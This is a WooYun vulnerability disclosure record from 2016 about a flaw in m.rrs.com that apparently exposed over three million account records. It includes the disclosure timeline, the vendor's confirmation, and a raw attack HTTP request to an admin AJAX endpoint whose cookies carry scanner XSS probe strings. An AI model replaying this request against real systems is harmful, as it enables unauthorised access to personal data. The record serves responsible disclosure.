乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-11: 细节已通知厂商并且等待厂商处理中 2016-05-13: 厂商已经确认,细节仅向厂商公开 2016-05-23: 细节向核心白帽子及相关领域专家公开 2016-06-02: 细节向普通白帽子公开 2016-06-12: 细节向实习白帽子公开 2016-06-27: 细节向公众公开
POST /snaplb/admin/menulevelservice/getinfo/menulevel.ajax HTTP/1.1Content-Length: 353Content-Type: application/x-www-form-urlencodedCookie: JSESSIONID=A70D0B53354901BACB9BEFBF6866FE49; rrs.com_ehaier_sessionid=67682DA5C5ACB656F9F9F724D2EF1C6E; rrs.com_ehaier_refererUrl="aHR0cDovL20ucnJzLmNvbS8="; rrs.com_ehaier_loginReturnUrl="aHR0cDovL20ucnJzLmNvbS9zaHVpL21vYmlsZS9waW5nYW4="; RRSSESS=e7g34t86s7gkebgnsivfjeam91; laravel_session=eyJpdiI6IlFJVTZYV2FYZFwvckdzT3lhcWI1b1l3PT0iLCJ2YWx1ZSI6IjhENXdiUXp3V2h1RTlYWk1jbTFsRnlZaVNBZnBBOXZhdlwvNXFraTlLVnlrV3Zzc2dYejdqYlRDTWlsbGlIcU80aWIycGI2QnplSXJrQzlBSzRWQWduQT09IiwibWFjIjoiNmYyMzdiZTUzNzg3ZmZkZmNlZmRlMDQ0Y2QxNDQ1NWRmOGQwYzhlY2I5ZGQ3ZGI5ODI1NzBlZGM2NzFiZTFiYiJ9; JSESSIONID=A70D0B53354901BACB9BEFBF6866FE49; ZXKJSESSIONID=43735fe5-ef4a-e052-6670-2147048924e1***1; UniqueName=43735fe5-ef4a-e052-6670-2147048924e1; Hm_lvt_e1b611e8ea607634925d9684f4e559e5=1462826878,1462827087,1462827310,1462827460; Hm_lpvt_e1b611e8ea607634925d9684f4e559e5=1462827460; _jzqa=1.4547732553112906000.1462826785.1462826785.1462826785.1; _jzqc=1; _jzqx=1.1462826785.1462826785.1.jzqsr=acunetix-referrer%2Ecom|jzqct=/javascript:domxssexecutionsink(0,"'\"><xsstag>()refdxss").-; _jzqckmp=1; _jzqb=1.11.10.1462826785.1; _qzja=1.668047106.1462826784881.1462826784881.1462826784881.1462830158492.1462830163560.%257B%257B_USER__name%257D%257D.1.0.20.1; _qzjb=1.1462826784881.20.0.0.0; _qzjc=1; _qzjto=20.1.0; HMACCOUNT=7A72A504167B356C; BAIDUID=D80BD201682D349E65CF00516B739F4C:FG=1; _gsref_113428431=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); _gscu_113428431=628268849w7j6y11; _gscs_113428431=62826884n31uwd11|pv:2; _gscbrs_113428431=1; NTKF_T2D_CLIENTID=guest578715F5-7A49-1619-68E7-C0CA6B804B6F; nTalk_CACHE_DATA={uid:he_1000_ISME9754_guest578715F5-7A49-16,tid:1462826909284801,opd:1}; Hm_lvt_504222469397f794ea8da61f8a4e10e2=1462829913,1462830158,1462830164,1462830412; Hm_lpvt_504222469397f794ea8da61f8a4e10e2=1462830412; nTalk_PAGE_MANAGE={|m|:[{|02026|:|270020|}],|t|:|04:50:02|}; SERVERID=4b4a76f761b5f05d5ba1368c620770ae|1462895108|1462895108; avr_137032388_0_0_4294901760_271286987_0=1854756157_60071446; Hm_lvt_972125b56f85b5c6ce2c83fd9305649e=1462829558,1462829669,1462829683,1462829913; Hm_lpvt_972125b56f85b5c6ce2c83fd9305649e=1462829913; __xsptplus163=163.1.1462828448.1462829913.12%233%7Cwww.acunetix-referrer.com%7C%7C%7C%7C%23%235CBGDdxBfWnucW7rlM1gtDfyRlm8qHDR%23; zid=a5a3a470f97a661e2b635fb6b309c9af; _pzfxuvpc=1462828582822%7C1416075934140965094%7C11%7C1462829913491%7C1%7C%7C1200018089110423045; _pzfxsvpc=1200018089110423045%7C1462828582822%7C11%7Chttp%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22)Host: m.rrs.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*codeType=1&codeTypeName=&parent=
300余万账户信息:
危害等级:高
漏洞Rank:16
确认时间:2016-05-13 10:43
感谢白帽子的测试与提醒,已安排人员进行处理,谢谢
暂无